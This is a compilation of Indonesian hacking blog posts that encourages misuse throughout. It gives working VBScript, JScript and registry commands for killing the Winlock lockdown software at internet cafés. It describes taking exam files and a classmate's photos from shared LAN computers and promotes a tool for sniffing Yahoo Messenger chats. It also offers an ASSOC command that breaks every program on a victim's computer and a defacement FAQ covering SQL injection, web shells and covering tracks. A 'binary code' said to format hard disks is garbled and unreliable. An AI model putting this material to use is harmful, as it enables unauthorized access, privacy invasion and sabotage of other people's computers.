Karena hal yang paling penting ketika anda membuat website adalah security nya dan design webnya nomor dua, maka dari itu  sebagai langkah antisipasi bagi anda yang mempunyai website adalah dengan mempatch website anda dengan plugin yang sudah disediakan secara gratis dan juga sering memperbaharui versi website anda ke versi  yang baru. Selain itu ada juga cara mendeteksi kelemahan suatu website  yaitu dengan berbagai tools yang banyak tersedia di google baik yang gratis maupun berbayar, tapi bagi anda yang tidak ingin banyak mengeluarkan banyak uang, bisa mendownload Acunetix Web Vulnerability Scanner versi freeware nya, dengan tool ini kita bisa mengetahui celah website seseorang dengan sangat mudah, hanya dengan memasukkan alamat website saja maka tool ini akan bekerja secara  otomatis  mencari celah-celah yang ada pada sebuah website. untuk nantinya bisa diperbaiki atau dipatch oleh  admin.
>> Free Download Acunetix Web Vulnerability Scanner


Sumber: http://trikstips.wordpress.com

Format harddisk pake notepad..!


wew..ada tutorial baru nie all n gw dapat dari bang yakub27..yaitu code buat format harrdisk..kekeke..ok brotha,,check this out:
1. Buka Notepad terus copas tulisan di bawah ini
Code: Select all
01001011000111110010010101010101010000011111100000
2. Simpan file dengan nama terserah anda. Yang penting ekstensinya .EXE
bisa kan save dengan ekstensi .EXE ??
jangan di gunakan di komputer pribadi anda
dan jangan sekali” mempunyai pikiran jahat denagn menggunakan ini..wkwkwkw
3.klo dah di save dengan ekstensi .EXE
trus di double click dehh.. bimsalabim.. punya hardisk baru deh..hahags
tips: kalo mau kerjain orang silahkan tambahkan autorun di massukan di flashdisk :D
1. format c:\ /Q/X — ini akan memformat drive c:
Code: Select all
01100110011011110111001001101101011000010111010000 10000001
1000110011101001011100
001000000010111101010001001011110101100
2. format d:\ /Q/X — ini akan memformat drive d:
Code: Select all
01100110011011110111001001101101011000010111010000 100000011
001000011101001011100
0010000000101111010100010010111101011000

Cara Hacking File Penting Di Komputer Server Yang Tidak Secure


anda seorang pelajar di sekolah yang akan menghadapi Ulangan Semester-an dan anda tidak sempat untuk menghapal materi ujian,, namun anda punya ide “Kreatif” untuk dapat mencari soal-soal ujian semesteran tersebut,,bagaimanapun caranya… biasanya file master dari soal ujian tersebut terdapat pada suatu komputer server yang kadang kala tidak ada admin yang menjaga,, dan file tersebut ter-sharing… ini kesempatan anda buat sedikit cerdik untuk dapat menguasai file-file ujian tersebut,, hhe
Atau misalnya anda ingin sekali mengambil file foto-foto cewe kecengan anda di komputer teman anda yang sedang terhubung kedalam jaringan.. ini juga kesempatan anda untuk dapat mengkoleksi foto” tersebut,,
Dari 2 kejadian diatas,, kita pasti punya perasaan ingin melakukanya,, sekaligus berlatih kemampuan hacking anda,, caranya sangat mudah untuk dapat menguasai file” penting di tempat anda kerja,sekolah, dan tempat umum,, yang anda perlu pastikan dalam melakukan aksi ini antara lain:
  • Cari tahu terlebih dahulu apakah komputer yang ingin anda hack terhubung dalam jaringan LAN atau tidak,, kalo tidak terhubung,, kita tidak dapat menjalankan aksinyaaa..
  • Siapkan Komputer client yang terhubung dalam jaringan LAN tersebut..Pastikan Komputer yang akan kita gunakan untuk melakukan hack terhubung dalam Jaringan
  • Sediakan Software untuk scan IP seperti “Advance IP Scanner & Advance LAN scanner” yang  dapat di download di google,, anda juga dapat menggunakan software “net cat” namun penggunaannya cukup sulit
  • Installkan Advance IP Scanner di komputer anda kemudian jalankan aplikasi nya,, berikut adalah tampilan aplikasinya:
  • ipKemudian Klik “C” pada toolbar IP Scanner.. Icon C berfungsi untuk mengecek IP Class C didalam Jaringan LAN Tempat anda lalu klik Scan.. IP Scanner akan Meng-scan IP yang Hidup di Jaringan Tempat Anda,, misalnya seperti gambar dibawah ini
  • 121212Carilah komputer yang anda curigai sebagai “Komputer Tempat menyimpan data penting seperti soal ujian dan data keuangan kantor” kemudian klik kanan lalu explorer,, Lalu carilah data penting yang anda butuhkan disini,, jangan Lupa untuk mengecek tiap komputer yang hidup.. Namun catetan penting,, hal ini dapat dilakukan bila keamanan komputer yang akan kita hack tidak secure dan telah ter sharing…
  • SeLamat,, anda dapat meng hack File penting anda dengan cara yang sangaT sederhana… SELAMAT MENCOBA

Hacking Winlock Warnet With Script


Tutorial Iseng Di Warnet Versi Winlock
Okey, Pasti semua udah tau winlock itu apa kan ?
Kalo blom tau search aja di google yah..
Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut.
Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut.
Dan Masih banyak lagi warnet-warnet yang menggunakan aplikasi ini.
Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut. Jiahahahah.
Sebenernya sudah saya tulis di website pribadi / blog saya, Cuma gak ada salahnya kan buat sharing disini ? heheheh..
OK. Yang dibutuhin cuma 1. Notepad / Wordpad.
ikirkan gimana caranya buat buka notepad tersebut. Banyak caranya.

Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music. hahaha..
Ya tinggal save as – pilih desktop – terus save dengan ekstensi .txt / .doc deh..
OK langsung aj yah, udah dibuka notepad/wordpad ?
Usahakan cek dulu ada deepfreeze atau kagak.
Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer.
Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.
Copy script ini
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next



Const HKEY_CLASSES_ROOT = &H80000000
strComputer = “.”
Set objRegistry=GetObject(“winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)

strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName
Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya.
Sebenernya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.
Keterangan :
Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?
Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID
OK. Sekarang step 2. (AKTIFKAN TASK MANAGER)
Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt).
Kalo taskmanager / startnya gak didisable, bisa langsung aja buka commandprompt di accesories.
Dan coba aja windows+R, kalo bisa, ya langsung aj copy script aktifkan command promptnya dibawah.
/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DWORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(“WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.suicidalizm.co.cc [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.suicidalizm.co.cc”;
prakata(pesan);
}

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager.
Lalu buka task manager (ctrl+alt+del) – Pilih tab users – Klik menu File – Pilih Run – Lalu copy paste script ini di situ
REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
Ini fungsinya buat mengaktifkan command prompt.
Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt.
Setelah masuk command prompt, Silahkan cari dimana folder winlock berada.
Misalkan berada di folder C:\program files\winlockpro
Ketik C: lalu enter Ketik cd program files lalu enter
Ketik cd winlockpro lalu enter
Dan ketik winlock.exe lalu enter
TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu.
Sekarang anda bebas mau ngapain aj. Mau Download/Colok USB/dll pokoknya bisa deh. Kan udah jadi admin =p

Yahoo Masengger spy



yahoo-messenger-spy-monitor-2008mao tau gak caranya ngintip orang yang lagi cahtting pake nich tools yang satu ini namanya, Yahoo Messenger Spy tools ini berfungsi menangkap pembicaraan chating dari komputer lain dalam jaringan lokal. So.., berhati-hatilah kalau berbicara yang rahasia, jangan sampai orang yang tidak bertanggung jawab mengetahuinya.
Capture and Sniff Yahoo Messenger chat conversations on all computers in network,It is able to record conversations automatically in real time,And export all intercepted messages to HTML files.  :-)
Download Now

Hacking Iseng(Menggunakan Comand promt)



Wew… Iseng itu boleh cuman jangan kelewatan aja Jiah, disini saya akan memberikan sedikit tips dan trik bagaimana ngerjain mungkin teman, sahabat, kekasih, mantan atau dirimu sendiri. Tehnik iseng merupakan tehnik yang kreatif dan gak ada habisnya makanya judulnya ada embel – embel Part. 1.
Akan ada ada Part. 2, 3, 4, dst. Dipecah biar nggak keliatan banyak. Tutorial disini saya kumpulkan dari beberapa sumber dan semoga “berguna” buat kalian… Iseng Mode ON…
1. Dengan menggunakan perintah ASSOC pada Command Prompt
Dah banyak tutorial yang membahas soal ini. Ini merupakan salah satu trik ampuh yang bisa kita gunakan untuk melakukan keisengan terhadap komputer orang lain
Caranya cukup mudah, kita tinggal membuka Command Prompt dan ketik perintah
Code:
ASSOC .exe=.terserah
Setelah kita menjalankan perintah tersebut maka seluruh file ber-extensi .EXE akan berubah menjadi .TERSERAH. Dan akibatnya semua aplikasi yang ada di komputer tersebut tidak bisa dijalankan
Seru banget kan, mampus dah tuh orang. Ini merupakan cara Favorit saya untuk berbuat iseng di kampus. Kalo dosen ngebetein ya langsung giniin aja komputernya.
Tentunya iseng juga ada batasnya kan? Nah kasian tuh orang nantinya keburu dia melakukan install ulang dah
Cara pertama yang bisa kita gunakan untuk mengembalikan kerusakan yang telah kita timbulkan adalah dengan menjalankan Command Prompt kembali dan ketikkan perintah berikut
Code:
assoc.exe=exefile

About Deface( FAQ + Video) Defacing FAQ (Baca ini Sbelum Nanya Soal Deface)


Ane liat banyak postingan yang inti pertanyaannya itu2 aja: gimana cara deface ?
Karena itu, ane putuskan utk bikin thread ini, isinya pertanyaan2 yg sering diajukan soal deface, thread ini ane kasi lem supaya gampang terbaca. Okeh, langsung aja dimulai, yg lain mo nambahin silakan.
Q: Deface itu apa ?
A: Deface (bukan device) itu tindakan mengubah sebagian atau seluruh tampilan suatu situs secara ilegal. Biasanya attacker juga menyisipkan pesan2 tertentu di situs yg dia deface.
Q: Trus gimana cara ngedeface ?
A: Cari kelemahan atau bug dari situs korban. Bug itu sendiri juga macam2, dan di sini paling sering dibahas soal SQL injection
Q: Nyari bugnya di mana ?
A: Bug biasanya ditemukan melalui tes penetrasi ke situs korban, pelajari dulu gimana cara web bekerja, pemrogramannya, dan mengapa bug yang bersangkutan bisa terjadi, ntar pasti kejawab sendiri.
Q: Belajar pemrograman web di mana ?
A: Favorit ane: ini, ini, ini, dan ini
Q: Apa itu SQL injection ?
A: SQLi itu metode untuk mengeksekusi query2 SQL tertentu di situs korban, biasanya melalui URL, contohnya untuk membaca username dan password yang disimpan dalam database
Q: Gimana cara mengeksploitasi bug SQLi ?
A: SEARCH SANA !!!
Q: XSS, apalagi tuh ?
A: XSS itu bug yang membuat kode HTML bisa dieksekusi di website korban, contohnya peng-echo-an parameter dari $_GET secara langsung tanpa filter.
Q: Gimana cara mengeksploitasi bug XSS ?
A: SEARCH SEARCH SEARCH !!!
Q: Kalo RFI/LFI ?
A: RFI = Remote File Inclusion, LFI = Local File Inclusion. Intinya, dengan bug ini kita bisa mengeksekusi (include) file lain di suatu web, baik yg local atau yg remote
Q: Cara mengeksploitasinya ?
A: SEARCH
Q: Shell itu apa ?
A: Shell itu sebuah intepretasi yg dipake user untuk berinteraksi dengan suatu sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug RFI/LFI.
Q: Gimana gw bisa dapetin web shell ?
A: Jelas di sini
Q: Okeh, gw berhasil ngedapetin password, tapi dienkripsi pake MD5, gimana cara decryptnya ?
A: Ane lurusin dikit, MD5 adalah sebuah hash dan gak bisa diencrypt, tapi bisa dicrack. Ada banyak toolnya bertebaran baik yg offline atau yg online, contohnya ini
Q: Gimana cara ngapus jejak ?
A: Coba liat ke sini
Q: Nyari halaman login admin di mana ?
A: Coba tebak2 aja, misalnya admin, login, administrator, dll. Kalo mo pake tools coba Accunetix. Cara lain, liat file robots.txt-nya (contoh: http://www.situs.com/robots.txt
Nih Liat video tutorialnya disini:
http://jambihackerlink.googlepages.com/VideoHacking.htm